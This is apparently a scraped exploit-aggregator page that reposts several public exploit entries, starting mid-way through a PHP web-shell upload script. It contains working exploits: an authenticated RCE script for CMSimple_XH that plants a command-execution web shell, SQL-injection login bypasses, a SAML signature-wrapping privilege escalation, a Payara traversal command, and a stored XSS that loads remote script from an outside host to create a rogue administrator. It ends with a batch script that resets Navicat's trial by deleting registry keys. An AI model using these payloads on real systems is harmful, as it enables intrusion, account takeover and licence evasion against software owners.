vulputate turpis quis volutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulum imperdiet, nulla vitae pharetra pretium, magna felis placerat libero, quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorper cursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapien consectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitae tortor vestibulum consequat ac quis risus. Sed finibus pharetra orci, id vehicula tellus eleifend sit amet.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Morbi id ante vel velit mollis egestas. Suspendisse pretium sem urna, vitae placerat turpis cursus faucibus. Ut dignissim molestie blandit. Phasellus pulvinar, eros id ultricies mollis, lectus velit viverra mi, at venenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibh felis. Donec faucibus, nulla at faucibus blandit, mi justo efficitur dui, non mattis nisl purus non lacus. Maecenas vel congue tellus, in convallis nisi. Curabitur faucibus interdum massa, eu facilisis ligula pretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Ut et urna sapien. Nulla lacinia sagittis felis id cursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elit ultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies non lorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, at pharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada, vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, in tincidunt mi. Aliquam sodales aliquam felis, eget tristique felis dictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesque mauris. Quisque sit amet varius augue.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Sed quis imperdiet est. Donec lobortis tortor id neque tempus, vel faucibus lorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristique nunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitae nisi. Curabitur at quam ut libero convallis mattis vel eget mauris. Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximus nulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrum non magna at, molestie gravida magna. Aenean neque sapien, volutpat a ullamcorper nec, iaculis quis est.</p>\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+name+".php\"\r\nContent-Type: application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"cover\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------38784447663334447953661330489--\r\n"

    requests.post(url, headers=headers, cookies=cookies, data=data)
    print('[+]Success!')
    print('[+]Getting reverse shell')
    time.sleep(2)





def RCE():
    
    path = 'http://'+site+'/vehicle_service/uploads/'
    html_text = requests.get(path).text
    soup = BeautifulSoup(html_text, 'html.parser')
    for link in soup.find_all('a'):
        data = link.get('href')
        if ".php"  in data:
            r = requests.get('http://'+site+'/vehicle_service/uploads/'+data)
            print('[+]Pwned!')



LoginAndShellUpload()
RCE()
HireHackking 
# Exploit Title: Phpwcms 1.9.30 - Arbitrary File Upload
# Date: 30/9/2021
# Exploit Author: Okan Kurtulus | okankurtulus.com.tr
# Software Link: http://www.phpwcms.org/
# Version: 1.9.30
# Tested on: Ubuntu 16.04

Steps:

1-) You need to login to the system.
http://target.com/phpwcms/login.php

2-) Creating payload with SVG extension: payload.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS!");
   </script>
</svg>


3-) Go to the following link and upload the payload:
http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8

From the menu:

file -> multiple file upload -> Select files or drop here

4-) After uploading payload, call it from the link below.

http://192.168.1.112/phpwcms/upload/
HireHackking 
# Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping
# Date: 09/07/2021
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://www.miniorange.com/
# Software Link: https://www.drupal.org/project/miniorange_saml
# Version: 8.x-2.22 (REQUIRED)
# Tested on: Linux Debian (PHP 8.0.7 with Apache/2.4.38)
# Original article:  https://blog.hacktivesecurity.com/index.php/2021/07/09/sa-contrib-2021-036-notsosaml-privilege-escalation-via-xml-signature-wrapping-on-minorangesaml-drupal-plugin/
# Drupal Security Advisory URL: https://www.drupal.org/sa-contrib-2021-036

---

The MiniorangeSAML Drupal Plugin v. 8.x-2.22 is vulnerable to XML 
Signature Wrapping Attacks that could allows an attacker to perform 
privilege escalation attacks.

In order to exploit the vulnerability, the plugin must be configured 
with the "Either SAML reponse or SAML assertion must be signed" options 
enabled and an empty "x509 certificate".

Administrator point of view:

- Install a Drupal version (for the PoC the version 9.1.10 has been used)

- Configure an external SSO system like Auth0

- Configure the plugin with the Auth0 provider by checking the "Either 
SAML response or SAML assertion must be signed" and empty "x509 certificate"


Attacker point of view:

- Register a normal user on the website

- Perform a login

- Intercept the request with Burp Suite and decode the SAMLResponse 
parameter

- Inject an additional <Saml:Assertion> object before the original one 
(example here: 
https://gist.github.com/voidz0r/30c0fb7be79abf8c79d1be9d424c9e3b#file-injected_object-xml) 
(SAMLRaider Burp extension, XSW3 payload)

<saml:Assertion ID="_evil_assertion_ID" IssueInstant="2021-06-23T21:04:01.551Z" Version="2.0"
 xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
 <saml:Issuer>urn:miniorange-research.eu.auth0.com</saml:Issuer>
 <saml:Subject>
 <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">admin</saml:NameID>
 <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
 <saml:SubjectConfirmationData InResponseTo="_f1e26bb0bd40be366c543e2c3fe0215747f40dadbb" NotOnOrAfter="2021-06-23T22:04:01.551Z" Recipient="http://localhost:8080/samlassertion"/>
 </saml:SubjectConfirmation>
 </saml:Subject>
 <saml:Conditions NotBefore="2021-06-23T21:04:01.551Z" NotOnOrAfter="2021-06-23T22:04:01.551Z">
 <saml:AudienceRestriction>
 <saml:Audience>http://localhost:8080</saml:Audience>
 </saml:AudienceRestriction>
 </saml:Conditions>
 <saml:AuthnStatement AuthnInstant="2021-06-23T21:04:01.551Z" SessionIndex="_WWwvhpmMv5eJI4bwPdsPAiasFpTH8gt_">
 <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified</saml:AuthnContextClassRef>
 </saml:AuthnContext>
 </saml:AuthnStatement>
 <saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">admin</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/identities/default/connection" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">Username-Password-Authentication</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/identities/default/provider" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">auth0</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/identities/default/isSocial" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/clientID" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">8bbK44pPnBAqzN49pSuwmgdhgsZavkNI</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/created_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/email_verified" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/nickname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">test</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/picture" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">https://s.gravatar.com/avatar/55502f40dc8b7c769880b10874abc9d0?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fte.png</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/updated_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">

 <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>

 </saml:Attribute>

 </saml:AttributeStatement>

</saml:Assertion>

- Replace the username with one with higher privileges (like admin)

- Submit the request

- Successful exploitation
HireHackking 
# Exploit Title: CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)
# Date: 01-10-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.cmsimple-xh.org/
# Software Link: https://www.cmsimple-xh.org/?Downloads
# Version: 1.7.4
# Category: Webapps
# Tested on: Linux/Windows


# CMSimple_XH is an open source project under GPL3 license
# Includes an endpoint that allows remote access
# Backup page is misconfigured, causing security vulnerability
# User information with sufficient permissions is required.

# Example: python3 exploit.py -u http://example.com -p Admin123



from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse


def main():
parser = argparse.ArgumentParser(description='CMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)')
parser.add_argument('-u', '--host', type=str, required=True)
parser.add_argument('-p', '--password', type=str, required=True)
args = parser.parse_args()
print("\nCMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)",
"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
host(args)



def host(args):
#Check http or https
if args.host.startswith(('http://', 'https://')):
print("[?] Check Url...\n")
sleep(2)
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
else:
pass
else:
print("\n[?] Check Adress...\n")
sleep(2)
args.host = "http://" + args.host
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
else:
pass


# Check Host Status
try:
response = requests.get(args.host)
if response.status_code == 200:
login(args)
else:
print("[-] Address not reachable!")
sleep(2)

except requests.ConnectionError as exception:
print("[-] Address not reachable!")
sleep(2)
exit(1)


def login(args):

url = args.host + "/?&login"
cookies = {
"XH_2f": "evil"
}
headers = {
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/?&login"
}
data = {
"login": "true",
"keycut": args.password,
"submit": "Login"
}
response = requests.post(url, headers=headers, cookies=cookies, data=data)

token = response.cookies.get("XH_2f")
soup = BeautifulSoup(response.text, 'html.parser')

if (soup.find("link",{"rel":"next"})['href'] != "/"):
print("[!] Login Success!\n")
sleep(2)
csrf(args,token)
else:
print("[!] Wrong password!!\n")
sleep(2)


def csrf(args, token):

url = args.host + "/?file=content"
cookies = {
"status": "adm",
"XH_2f": token
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/?&settings",
"Accept-Encoding": "gzip, deflate",
"Connection": "close"
}
response = requests.get(url, headers=headers, cookies=cookies)

try:
soup = BeautifulSoup(response.text, 'html.parser')
csrf = soup.find_all("input", type="hidden")[3].get("value")
create(args, token, csrf)
except Exception as e:
print(e)
else:
pass



def create(args, token, csrf):

payload = "<?php\r\nfile_put_contents('./evil.php', \"\\x3c\\x3fphp system(\\x24_GET['cmd']);\\x3f\\x3e\");\r\n?>\r\n"

url = args.host
cookies = {
"status": "adm",
"XH_2f": token
}
headers = {
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/?file=content&action=edit&xh_success=content",
"Accept-Encoding": "gzip, deflate"
}
data = {
"text": payload,
"file": "content",
"action": "save",
"xh_csrf_token": csrf
}
response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=True)

if (response.status_code == 200):
print("[!] Create Vuln File!\n")
sleep(2)
exploit(args)
else:
print("[!] Create Failed!\n")
sleep(2)


def exploit(args):

print("[+] Exploit Done!\n")
sleep(2)

while True:
cmd = input("$ ")
url = args.host + "/evil.php?cmd=" + cmd
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
}

response = requests.post(url, headers=headers, timeout=5)

if response.text == "":
print(cmd + ": command not found\n")
else:
print(response.text)



if __name__ == '__main__':
main()
HireHackking 
# Exploit Title: Payara Micro Community 5.2021.6 - Directory Traversal
# Date: 01/10/2021
# Exploit Author: Yasser Khan (N3T_hunt3r)
# Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
# Software Link: https://www.payara.fish/downloads/payara-platform-community-edition/#x
# Version: Payara Micro Community 5.2021.6
# Tested on: Linux/Windows OS
# CVE : CVE-2021-41381

https://nvd.nist.gov/vuln/detail/CVE-2021-41381

Proof of Concept:

Step1: Open the browser check the version of the payara software

Step2: Add this Path at end of the URL
/.//WEB-INF/classes/META-INF/microprofile-config.properties

Step3: Check the response with match containing
"payara.security.openid.default.providerURI="

"payara.security.openid.sessionScopedConfiguration=true"

Step4 : If any of these contents in the response then the application is vulnerable to Directory Traversal Vulnerability.

Step5: Alternatively we can use CURL by using this command:

Request:
curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties

Reference:

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
https://nvd.nist.gov/vuln/detail/CVE-2021-41381
HireHackking 
# Exploit Title: Directory Management System  1.0 - SQL Injection Authentication Bypass
# Date: 2021-10-01
# Exploit Author: SUDONINJA
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/directory-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows 10

Steps-To-Reproduce:
Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
Step 2 – Enter anything in username and password
Step 3 – Click on Login and capture the request in the burp suite
Step 4 – Change the username to admin' or '1'='1  and password to dfsms
Step 5 – Click forward and now you will be logged in as admin.

POC

POST /dms/admin/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: http://localhost
Connection: close
Referer: http://localhost/dms/admin/
Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
Upgrade-Insecure-Requests: 1

username=admin%27+or+%271%27%3D%271&password=admin%27+or+%271%27%3D%271&login=login
HireHackking 
# Exploit Title: WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)
# Date: 09.17.2021
# Exploit Author: Andreas Finstad (4ndr34z)
# Vendor Homepage: https://www.whatsupgold.com
# Version: v.21.0.3, Build 188
# Tested on: Windows 2019 Server
# CVE : CVE-2021-41318
# Reference: https://f20.be/cves/poc-cve-2021-41318

Description:
Improper validation of strings from discovered SNMP devices, makes the application prone to stored XXS attacks.
Placing a XSS payload in one of the fields reflected onto the application, triggers the exploitation.
No CSRF protection/token on adding/posting a new user account, makes it possible to create a rouge administrator, using a staged javascript delivered through the XSS.

SNMP A nix computer placed on a subnet accessible from the server for discovery, you edit the SNMPd.conf, adding the payload:

# snmpd.conf
# An example configuration file for configuring the Net-SNMP agent ('snmpd')
# See snmpd.conf(5) man page for details
############################################################################
# SECTION: System Information Setup
# syslocation: The [typically physical] location of the system.
# Note that setting this value here means that when trying to
# perform an snmp SET operation to the sysLocation.0 variable will make
# the agent return the "notWritable" error code.  IE, including
# this token in the snmpd.conf file will disable write access to
# the variable.
# arguments:  location_string
sysName Evil-Device
sysLocation    Somewhere Over The Rainbow
sysContact     <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly8xOTIuMTY4LjY2LjQ2L3guanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 src=x onerror=eval(atob(this.id))>

This is the base64 encoded string:
var a=document.createElement("script");a.src="http://192.168.66.46/x.js";document.body.appendChild(a);

x.js:
var vhost = window.location.protocol+'\/\/'+window.location.host
var username = "sysadmin"
var password = "me"

fetch(vhost+'/NmConsole/api/core/WebUser',{
    method: 'POST',
    headers: {
        'Content-Length': '479',
        'Accept': 'application/json',
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.51',
        'Content-Type': 'application/json',
        'Origin': vhost,
        'Referer': vhost+'/NmConsole/',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4',
        'Connection': 'close'
    },
    credentials: 'include',
        body: '{"HomeDeviceGroupID":0,"HomeDeviceGroupPath":"My Network","LanguageID":1033,"UserRightsMask":"0","IsDgarConfigured":false,"Groups"   [1],"WebUserID":-1,"UserName":"'+username+'","AuthenticationType":1,"ApplyWebUiSessionTimeout":true,"ApplyLockoutPolicy":false,"ApplyPasswordAging":false,"ApplyPasswordComplexity":false,"ApplySessionPolicy":false,"FailedLoginCount":0,"IsLocked":false,"Password":"'+password+'","UnlockUser":false,"WebConfigurationSettings":"","id":"Wug.model.userManagement.WebUser-2"}'
});
HireHackking 
# Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass
# Date: 2021-09-30
# Exploit Author: sanjay singh
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows 10

Steps-To-Reproduce:
Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
Step 2 – Enter anything in username and password
Step 3 – Click on Login and capture the request in the burp suite
Step 4 – Change the username to admin' or '1'='1  and password to dfsms
Step 5 – Click forward and now you will be logged in as admin.

POC

POST /dfsms/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Origin: http://localhost
Connection: close
Referer: http://localhost/dfsms/index.php
Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
Upgrade-Insecure-Requests: 1

username=admin%27+or+%271%27%3D%271&password=dfsms&login=
HireHackking 
# Exploit Title: Lodging Reservation Management System 1.0 - Authentication Bypass
# Date: 2021-09-20 
# Exploit Author: Nitin Sharma(vidvansh)
# Vendor Homepage: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code
# Version: v1.0
# Tested on: Windows 10 - XAMPP Server 


# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts.

#Steps-To-Reproduce:
Step 1 Go to the Product admin panel http://localhost/lodge/admin/login.php.
Step 2 – Enter anything in username and password
Step 3 – Click on Login and capture the request in the burp suite
Step4 – Change the username to ' OR 1 -- -  and password to ' OR 1 -- -.
Step 5 – Click forward and now you will be logged in as admin.

# PoC:

POST /lodge/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://localhost
Connection: close
Referer: http://localhost/lodge/admin/login.php
Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+


# Authentication Bypass:

# Go to admin login page (http://localhost/lodge/admin/login.php), then use below payload as username and password => 
Username: ' or 1 -- -			
Password: ' or 1 -- -
HireHackking

Navicat Premium is a great database management tool. Connect this tool to a database where you can see detailed information for various databases. This includes reporting errors, etc. Of course, you can also log in to the database through it and perform various operations. Navicat Premium is a multi-link database management tool that allows you to connect to MySQL, SQLite, Oracle and PostgreSQL databases simultaneously in one program, making it easier to manage different types of databases.

version

Navicat Premium 16.0.10

Download

Official website download address: https://www.navicat.com.cn/products/navicat-premium

New Features in Navicat Premium 16

1. Chart

Navicat 16 provides more data sources and chart support. We focus very much on improving usability and accessibility to provide vital information for your work.

2. Data generation

Data generation helps you create a large amount of test data. Lets you create complex data in multiple tables that are associated with each other.

3. On-Prem Server has now been added to our Navicat series. We provide you with the option to host cloud environments to store Navicat objects internally where you are.

4. Connect to the configuration file

Configure multiple connection profiles for outbound users, and connect settings can be switched according to the current location of the device used.

5. Productivity

Navicat 16 has numerous features and UI/UX improvements to meet your database development needs. Provides you with new ways to build, manage and maintain databases.

Installation

ya3h0srudb54267.jpg

qn2jrl1roce4268.jpg

2pcvxp25wml4269.jpg

Cracking

Navicat 16.0.10 currently has no registration machine, but we can use the method of clearing the registry. to extend the probation period. Of course, you can also download the cracked version of other versions of 16.0.x.

The script is as follows:

@echo off

echo Delete HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPremium\Registration[version and language]

for /f %%i in (''REG QUERY 'HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPremium' /s | findstr /L Registration'') do (

reg delete %%i /va /f

)

echo.

echo Delete Info folder under HKEY_CURRENT_USER\Software\Classes\CLSID

for /f %%i in (''REG QUERY 'HKEY_CURRENT_USER\Software\Classes\CLSID' /s | findstr /E Info'') do (

reg delete %%i /va /f

)

echo.

echo Finish

pause so when Navicat expires, we double-click the script. You can play happily again.